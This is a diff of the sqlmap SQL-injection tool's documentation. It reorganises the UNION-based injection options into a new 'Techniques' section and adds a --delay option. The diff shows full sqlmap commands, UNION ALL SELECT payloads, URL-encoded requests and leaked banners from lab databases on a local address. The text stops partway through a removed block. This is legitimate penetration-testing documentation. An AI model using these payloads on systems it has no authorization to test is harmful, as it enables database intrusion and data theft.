diff --git a/doc/README.html b/doc/README.html
index 421e8d2ec..28197b9b9 100644
--- a/doc/README.html
+++ b/doc/README.html
@@ -38,12 +38,13 @@ for the latest version.</EM>
 
 <UL>
 <LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Request</A>
-<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Injection</A>
-<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Fingerprint</A>
-<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Enumeration</A>
-<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">File system access</A>
-<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Operating system access</A>
-<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Miscellaneous</A>
+<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Techniques</A>
+<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Injection</A>
+<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Fingerprint</A>
+<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Enumeration</A>
+<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">File system access</A>
+<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Operating system access</A>
+<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Miscellaneous</A>
 </UL>
 <P>
 <H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2>
@@ -360,11 +361,22 @@ Options:
     --auth-cred=ACRED   HTTP Authentication credentials, value: name:password
     --proxy=PROXY       Use a HTTP proxy to connect to the target url
     --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
+    --delay=DELAY       Delay in seconds between each HTTP request
 
   Injection:
     --string=STRING     String to match in page when the query is valid
     --dbms=DBMS         Force back-end DBMS to this value
 
+  Techniques:
+    These options can be used to test for specific SQL injection technique
+    or to use one of them to exploit the affected parameter(s) rather than
+    using the default blind SQL injection technique.
+
+    --time-test         Test for Time based blind SQL injection
+    --union-test        Test for UNION SELECT (inband) SQL injection
+    --union-use         Use the UNION SELECT (inband) SQL injection to
+                        retrieve the queries output. No need to go blind
+
   Fingerprint:
     -f, --fingerprint   Perform an extensive database fingerprint
 
@@ -381,9 +393,9 @@ Options:
     --privileges        Enumerate DBMS users privileges (opt: -U)
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables (opt: -D)
-    --columns           Enumerate DBMS database table columns (req: -T, -D)
-    --dump              Dump DBMS database table entries (req: -T, -D opt: -C,
-                        --start, --stop)
+    --columns           Enumerate DBMS database table columns (req:-T opt:-D)
+    --dump              Dump DBMS database table entries (req: -T, opt: -D,
+                        -C, --start, --stop)
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
@@ -413,9 +425,6 @@ Options:
                         server document root for the moment)
 
   Miscellaneous:
-    --union-test        Test for UNION SELECT (inband) SQL injection
-    --union-use         Use the UNION SELECT (inband) SQL injection to
-                        retrieve the queries output. No need to go blind
     --eta               Retrieve each query output length and calculate the
                         estimated time of arrival in real time
     -v VERBOSE          Verbosity level: 0-5 (default 0)
@@ -1031,9 +1040,23 @@ Connection: close
 </P>
 
 <P>Note that the HTTP <CODE>User-Agent</CODE> header is tested against SQL
-injection even if you do not overwrite the default sqlmap HTTP
+injection also if you do not overwrite the default sqlmap HTTP
 <CODE>User-Agent</CODE> header value.</P>
 
+<P>Some sites perform a server-side check on the HTTP <CODE>User-Agent</CODE>
+header value and fail the HTTP response if a valid <CODE>User-Agent</CODE> is
+not provided, its value is not expected or its value is blocked by a web
+application firewall or similar intrusion prevention system. In this case
+sqlmap will show you a message as follows:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
+to force the HTTP User-Agent header with option --user-agent or -a
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
 
 <H3>HTTP <CODE>Basic</CODE> and <CODE>Digest</CODE> authentications</H3>
 
@@ -1172,7 +1195,161 @@ seven HTTP requests, the maximum to retrieve a query output character.</P>
 request. The valid value is a float, for instance 0.5.</P>
 
 
-<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Injection</A>
+<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Techniques</A>
+</H2>
+
+<H3>Test for Time Based Blind SQL injection</H3>
+
+<P>Option: <CODE>--time-test</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>Test for UNION SELECT query SQL injection</H3>
+
+<P>Option: <CODE>--union-test</CODE></P>
+
+<P>It is possible to test if the target URL is affected by an <B>inband
+SQL injection</B> vulnerability.
+Refer to the <EM>Techniques</EM> section for details on this SQL injection
+technique.</P>
+
+<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:  Oracle
+
+[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
+NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:  PostgreSQL
+
+[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
+NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
+affected by an inband SQL injection.
+In case this vulnerability is exploitable it is strongly recommended to
+use it.</P>
+
+<H3>Use the UNION SELECT query SQL injection</H3>
+
+<P>Option: <CODE>--union-use</CODE></P>
+
+<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
+the target URL is affected by an <B>inband SQL injection</B>
+(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
+exploitable, it will trigger this vulnerability to retrieve the output of
+the <CODE>SELECT</CODE> queries.</P>
+
+<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
+  --union-use --banner
+
+[...]
+back-end DBMS:  Microsoft SQL Server 2000
+
+[hh:mm:42] [INFO] fetching banner
+[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
+[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
+CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
+CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
+[hh:mm:42] [INFO] performed 3 queries in 0 seconds
+banner:
+---
+Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
+        Aug  6 2000 00:57:48 
+        Copyright (c) 1988-2000 Microsoft Corporation
+        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
+---
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
+blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
+
+<P>Example on a <B>MySQL 5.0.51</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
+  --union-use --banner
+
+[...]
+[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
+IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
+AND 6043=6043
+[hh:mm:25] [TRAFFIC OUT] HTTP request:
+GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
+%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
+%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
+06043=6043&amp;cat=2 HTTP/1.1
+Host: 192.168.1.121:80
+User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
+Connection: close
+
+[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
+Date: Mon, 28 Jul 2008 22:34:25 GMT
+Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
+OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
+X-Powered-By: PHP/5.2.4-2ubuntu5.2
+Content-Length: 194
+Connection: close
+Content-Type: text/html
+
+&lt;html&gt;&lt;body&gt;
+&lt;b&gt;SQL results:&lt;/b&gt;
+&lt;table border="1"&gt;
+&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
+&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
+&lt;/table&gt;
+&lt;/body&gt;&lt;/html&gt;
+
+[hh:mm:25] [INFO] performed 3 queries in 0 seconds
+banner:    '5.0.51a-3ubuntu5.2'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
+nested (inband) within the HTTP response page, this makes the inband SQL
+injection exploitable.</P>
+
+
+<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
 </H2>
 
 <H3>String match</H3>
@@ -1369,7 +1546,7 @@ back-end database management system. If you do not know it, let sqlmap
 automatically identify it for you.</P>
 
 
-<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Fingerprint</A>
+<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Fingerprint</A>
 </H2>
 
 <H3>Extensive database management system fingerprint</H3>
@@ -1584,7 +1761,7 @@ parsing library that fetches data from Chip Andrews'
 <A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P>
 
 
-<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Enumeration</A>
+<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Enumeration</A>
 </H2>
 
 <H3>Banner</H3>
@@ -2664,7 +2841,7 @@ column names of the table then asks if the query can return multiple
 entries and goes on.</P>
 
 
-<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">File system access</A>
+<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">File system access</A>
 </H2>
 
 <H3>Read a specific file content</H3>
@@ -2708,7 +2885,7 @@ inquis:x:1000:100:Bernardo Damele A. G.,,,:/home/inquis:/bin/bash
 </P>
 
 
-<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Operating system access</A>
+<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Operating system access</A>
 </H2>
 
 <H3>Prompt for an interactive operating system shell</H3>
@@ -2746,153 +2923,9 @@ $ exit
 functionalities of SQL shell.</P>
 
 
-<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Miscellaneous</A>
+<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Miscellaneous</A>
 </H2>
 
-<H3>Test for UNION SELECT query SQL injection</H3>
-
-<P>Option: <CODE>--union-test</CODE></P>
-
-<P>It is possible to test if the target URL is affected by an <B>inband
-SQL injection</B> vulnerability.
-Refer to the <EM>Techniques</EM> section for details on this SQL injection
-technique.</P>
-
-<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:  Oracle
-
-[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:  PostgreSQL
-
-[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
-NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
-affected by an inband SQL injection.
-In case this vulnerability is exploitable it is strongly recommended to
-use it.</P>
-
-<H3>Use the UNION SELECT query SQL injection</H3>
-
-<P>Option: <CODE>--union-use</CODE></P>
-
-<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
-the target URL is affected by an <B>inband SQL injection</B>
-(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
-exploitable, it will trigger this vulnerability to retrieve the output of
-the <CODE>SELECT</CODE> queries.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
-  --union-use --banner
-
-[...]
-back-end DBMS:  Microsoft SQL Server 2000
-
-[hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
-CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
-CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
-[hh:mm:42] [INFO] performed 3 queries in 0 seconds
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-        Aug  6 2000 00:57:48 
-        Copyright (c) 1988-2000 Microsoft Corporation
-        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
-blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
-
-<P>Example on a <B>MySQL 5.0.51</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
-  --union-use --banner
-
-[...]
-[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
-IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
-AND 6043=6043
-[hh:mm:25] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
-%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
-%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
-06043=6043&amp;cat=2 HTTP/1.1
-Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Mon, 28 Jul 2008 22:34:25 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 194
-Connection: close
-Content-Type: text/html
-
-&lt;html&gt;&lt;body&gt;
-&lt;b&gt;SQL results:&lt;/b&gt;
-&lt;table border="1"&gt;
-&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
-&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
-&lt;/table&gt;
-&lt;/body&gt;&lt;/html&gt;
-
-[hh:mm:25] [INFO] performed 3 queries in 0 seconds
-banner:    '5.0.51a-3ubuntu5.2'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
-nested (inband) within the HTTP response page, this makes the inband SQL
-injection exploitable.</P>
-
-
 <H3>Estimated time of arrival</H3>
 
 <P>Option: <CODE>--eta</CODE></P>
diff --git a/doc/README.pdf b/doc/README.pdf
index 78d54b3e6..4573c5478 100644
Binary files a/doc/README.pdf and b/doc/README.pdf differ
diff --git a/doc/README.sgml b/doc/README.sgml
index 345fb7bd2..688f56b50 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -323,11 +323,22 @@ Options:
     --auth-cred=ACRED   HTTP Authentication credentials, value: name:password
     --proxy=PROXY       Use a HTTP proxy to connect to the target url
     --threads=THREADS   Maximum number of concurrent HTTP requests (default 1)
+    --delay=DELAY       Delay in seconds between each HTTP request
 
   Injection:
     --string=STRING     String to match in page when the query is valid
     --dbms=DBMS         Force back-end DBMS to this value
 
+  Techniques:
+    These options can be used to test for specific SQL injection technique
+    or to use one of them to exploit the affected parameter(s) rather than
+    using the default blind SQL injection technique.
+
+    --time-test         Test for Time based blind SQL injection
+    --union-test        Test for UNION SELECT (inband) SQL injection
+    --union-use         Use the UNION SELECT (inband) SQL injection to
+                        retrieve the queries output. No need to go blind
+
   Fingerprint:
     -f, --fingerprint   Perform an extensive database fingerprint
 
@@ -344,9 +355,9 @@ Options:
     --privileges        Enumerate DBMS users privileges (opt: -U)
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables (opt: -D)
-    --columns           Enumerate DBMS database table columns (req: -T, -D)
-    --dump              Dump DBMS database table entries (req: -T, -D opt: -C,
-                        --start, --stop)
+    --columns           Enumerate DBMS database table columns (req:-T opt:-D)
+    --dump              Dump DBMS database table entries (req: -T, opt: -D,
+                        -C, --start, --stop)
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
@@ -376,9 +387,6 @@ Options:
                         server document root for the moment)
 
   Miscellaneous:
-    --union-test        Test for UNION SELECT (inband) SQL injection
-    --union-use         Use the UNION SELECT (inband) SQL injection to
-                        retrieve the queries output. No need to go blind
     --eta               Retrieve each query output length and calculate the
                         estimated time of arrival in real time
     -v VERBOSE          Verbosity level: 0-5 (default 0)
@@ -977,9 +985,21 @@ Connection: close
 
 <p>
 Note that the HTTP <tt>User-Agent</tt> header is tested against SQL
-injection even if you do not overwrite the default sqlmap HTTP
+injection also if you do not overwrite the default sqlmap HTTP
 <tt>User-Agent</tt> header value.
 
+<p>
+Some sites perform a server-side check on the HTTP <tt>User-Agent</tt>
+header value and fail the HTTP response if a valid <tt>User-Agent</tt> is
+not provided, its value is not expected or its value is blocked by a web
+application firewall or similar intrusion prevention system. In this case
+sqlmap will show you a message as follows:
+
+<tscreen><verb>
+[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
+to force the HTTP User-Agent header with option --user-agent or -a
+</verb></tscreen>
+
 
 <sect2>HTTP <tt>Basic</tt> and <tt>Digest</tt> authentications
 
@@ -1118,6 +1138,160 @@ It is possible to specify a number of seconds to wait between each HTTP
 request. The valid value is a float, for instance 0.5.
 
 
+<sect1>Techniques
+
+<sect2>Test for Time Based Blind SQL injection
+
+<p>
+Option: <tt>--time-test</tt>
+
+<p>
+TODO
+
+
+<sect2>Test for UNION SELECT query SQL injection
+
+<p>
+Option: <tt>--union-test</tt>
+
+<p>
+It is possible to test if the target URL is affected by an <bf>inband
+SQL injection</bf> vulnerability.
+Refer to the <em>Techniques</em> section for details on this SQL injection
+technique.
+
+<p>
+Example on an <bf>Oracle XE 10.2.0.1</bf> target:
+
+<tscreen><verb>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:  Oracle
+
+[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
+NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
+</verb></tscreen>
+
+<p>
+Example on a <bf>PostgreSQL 8.2.7</bf> target:
+
+<tscreen><verb>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:	PostgreSQL
+
+[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
+NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
+</verb></tscreen>
+
+<p>
+As you can see, the target URL parameter <tt>id</tt> might be also
+affected by an inband SQL injection.
+In case this vulnerability is exploitable it is strongly recommended to
+use it.
+
+<sect2>Use the UNION SELECT query SQL injection
+
+<p>
+Option: <tt>--union-use</tt>
+
+<p>
+Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
+the target URL is affected by an <bf>inband SQL injection</bf>
+(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
+exploitable, it will trigger this vulnerability to retrieve the output of
+the <tt>SELECT</tt> queries.
+
+<p>
+Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
+
+<tscreen><verb>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
+  --union-use --banner
+
+[...]
+back-end DBMS:	Microsoft SQL Server 2000
+
+[hh:mm:42] [INFO] fetching banner
+[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
+[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
+CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
+CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
+[hh:mm:42] [INFO] performed 3 queries in 0 seconds
+banner:
+---
+Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
+	Aug  6 2000 00:57:48 
+	Copyright (c) 1988-2000 Microsoft Corporation
+	Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
+---
+</verb></tscreen>
+
+<p>
+As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
+blind SQL injection and exploitable inband SQL injection vulnerabilities.
+
+<p>
+Example on a <bf>MySQL 5.0.51</bf> target:
+
+<tscreen><verb>
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
+  --union-use --banner
+
+[...]
+[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
+IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
+AND 6043=6043
+[hh:mm:25] [TRAFFIC OUT] HTTP request:
+GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
+%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
+%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
+06043=6043&amp;cat=2 HTTP/1.1
+Host: 192.168.1.121:80
+User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
+Connection: close
+
+[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
+Date: Mon, 28 Jul 2008 22:34:25 GMT
+Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
+OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
+X-Powered-By: PHP/5.2.4-2ubuntu5.2
+Content-Length: 194
+Connection: close
+Content-Type: text/html
+
+&lt;html&gt;&lt;body&gt;
+&lt;b&gt;SQL results:&lt;/b&gt;
+&lt;table border="1"&gt;
+&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
+&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
+&lt;/table&gt;
+&lt;/body&gt;&lt;/html&gt;
+
+[hh:mm:25] [INFO] performed 3 queries in 0 seconds
+banner:    '5.0.51a-3ubuntu5.2'
+</verb></tscreen>
+
+<p>
+As you can see, the MySQL <tt>version()</tt> function (banner) output is
+nested (inband) within the HTTP response page, this makes the inband SQL
+injection exploitable.
+
+
 <sect1>Injection
 
 <sect2>String match
@@ -2671,149 +2845,6 @@ functionalities of SQL shell.
 
 <sect1>Miscellaneous
 
-<sect2>Test for UNION SELECT query SQL injection
-
-<p>
-Option: <tt>--union-test</tt>
-
-<p>
-It is possible to test if the target URL is affected by an <bf>inband
-SQL injection</bf> vulnerability.
-Refer to the <em>Techniques</em> section for details on this SQL injection
-technique.
-
-<p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:  Oracle
-
-[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
-</verb></tscreen>
-
-<p>
-Example on a <bf>PostgreSQL 8.2.7</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:	PostgreSQL
-
-[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
